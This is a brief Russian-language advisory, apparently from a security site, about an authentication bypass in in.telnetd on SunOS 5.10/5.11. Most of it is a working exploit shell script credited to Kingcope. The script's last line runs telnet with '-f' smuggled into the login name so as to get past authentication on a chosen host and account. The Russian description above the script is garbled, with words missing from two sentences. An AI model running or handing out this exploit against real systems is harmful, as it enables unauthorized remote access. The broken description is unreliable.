Программа: SunOS 5.10/5.11

Уязвимость позволяет удаленному злоумышленнику механизм аутентификации на целевой системе. Уязвимость существует из-за ошибки в проверке входных в in.telnetd. Атакующий может обойти механизм аутентификации на целевой системе.

Пример:

#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo "./sunos <host> <account>"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1



Оставить мнение